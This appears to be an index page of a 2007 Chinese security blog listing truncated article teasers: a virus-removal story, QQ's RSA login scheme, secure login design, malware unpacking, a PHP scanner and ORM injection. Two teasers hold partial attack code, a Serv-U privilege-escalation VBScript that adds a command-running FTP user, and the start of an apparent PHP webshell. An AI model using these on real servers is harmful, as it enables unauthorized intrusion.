鬼仔's Blog

来源：灰狐's Blog

注：本文已发表在2007年《黑客防线》第11期，转载请注明出处！

话说某天晚上，小菜我写代码写的煞是心烦，刚想放松一会儿，任务栏里的企鹅图标就不停地叫了起来，MM求救：电脑中毒了。
她的卡巴已经查到了病毒，但没有杀掉。根据扫描提示，很快在百度上找到了答案，司机报警的文件名为algsrvs.exe，经查得知是fun.xls.exe病毒，tel.xls.exe的变种之一。网上给出了一个比较完整的查杀方法，主要症状如下：
1、在“我的电脑”中双击任意驱动器时，会在新窗口中打开此驱动器；
2、不能显示隐藏文件；
3、右击任一驱动器时，在快捷菜单中的第一项显有“Auto”命令；
查杀方法：
第一步：在“任务管理器”中结束“Excel”程序（也就是algsrvs.exe进程）；
第二步：删除如下四个文件：
阅读全文 »

by axis
2007-11-23
http://www.ph4nt0m.org

QQ网站登录处没有使用https进行加密，而是采用了RSA非对称加密来保护传输过程中的
密码以及敏感信息的安全性。 QQ是在javascript中实现整个过程的。这个想法非常新
颖，详细可以参考云舒写过的 《RSA非对称加密的一些非常规应用》，地址为
http://www.icylife.net/yunshu/show.php?id=471

这个原理简单描述为下：
1. 在server端生成一对RSA密钥，包括public key 和 private key
2. public key传输给客户端浏览器， 客户端浏览器用public key加密敏感数据，比如
密码；加密后的密文传回给server，然后server用 private key解密。
阅读全文 »

Team: http://www.ph4nt0m.org
Author: 云舒（http://www.icylife.net/）
Date: 2007-11-23

最近在考虑一个安全可靠的，容易部署的方案来解决登陆的安全问题，因为这个问题随着网上银行，网络游戏等的兴起而越来越重要。之所以想跨平台，是因为最近很多的linux用户在网上讨论linux，firefox这些使用网银等时候遇到的麻烦。我恰好看了他们的很多讨论，除了口水之外没有别的东西，只废话而不做事的废柴太多了。因此，我就有了这么一篇文章，介绍一下怎么实现安全的登陆。题外话一句，我对web安全的各种技巧，其实没有太大的兴趣，虽然闲得没事也会偶尔玩玩，只是和我玩CS差不多而已。

一. 登陆面临的安全攻击
阅读全文 »

鬼仔注：文章末尾所添加的机器狗、IGM、写穿还原的工具（已可以被卡巴检测到是病毒）是在无敌小龙那里看到的，我加了个备用地址。

样本脱壳
OD加载样本explorer.exe，
对GetModuleHandleA下断，参数为NULL时即为入口点处对此函数的调用，
退出CALL之后可以得到入口为 004016ED。
重新加载样本，对004016ED下内存写入断点，中断后StepOver一步，然后在004016ED
下断点，F9运行到入口，DUMP。DUMP之后不关闭OD，让样本处于挂起状态，使用ImportREC修复DUMP
出来的文件的导入表。
修复之后DUMP出来的文件用OD加载出错，使用PEDITOR的rebuilder功能重建PE之后即可用OD加载，说明
脱壳基本成功，但资源部分仍有问题,无法用Reshacker查看
阅读全文 »

来源：资安之眼

XSS 及 SQL injection 已成为当前网页应用程式的主要问题，本站也介绍过一些免费的小工具，像是网页程式执行后的 Wapiti 渗透工具，执行中的 PHPIDS 入侵侦测工具，而这次的工具则是执行前的 Pixy原始码检测工具。

Pixy是一套以 Java 开发 PHP 原始码扫描工具，主要用以自动发掘 XSS 及 SQL injection 问题，只要作业系统已安装了Java SE6，解压缩后即可执行，在 run-all.pl (如果你的环境有安装 Perl) 或是 run-all.bat (仅供Windows) 后面接上你的 阅读全文 »

来源：NetKnave's BLog

修改ftpport为21

修改newdomain后面的goldsun| IP(为要提权的服务器的IP地址)|

修改newuser后面的 -IP=IP地址和上面一样(为要提权的服务器的IP地址)…OK…..提权…会用FTP增加一个可以

执行命令的用户…..有个这个用户什么不能做哈…..
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DeleteDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
阅读全文 »

loveshell：哎 下次仔细看下代码再发!Just a joke…
鬼仔注：未测试。

来源：坏狼安全网

// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');

if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}

$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");
阅读全文 »

TEAM : I.S.T.O
AUTHOR : kj021320
官方BLOG : http://blog.csdn.net/I_S_T_O
转载需注明作者,未经作者同意,不得用于任何形式的商业活动

现在越来越流行ORM技术~~~程序员把有关数据库的操作都交给持久层去处理,
也为了更方便所以框架也提供了另外对象查询语言例如HIBERNATE的HQL EJB的EJBQL等
这是好事吗？恩 的确很好~对于严谨的程序员来说！但是对于那些对技术一知半解的就不一定了！
或者对于那些偷懒的人来说更是糟糕的事情
以下我分别采用3大常用的持久层框架,加上代码的片段

Ibatis

<select id="unsafe" resultMap="myResultMap">
阅读全文 »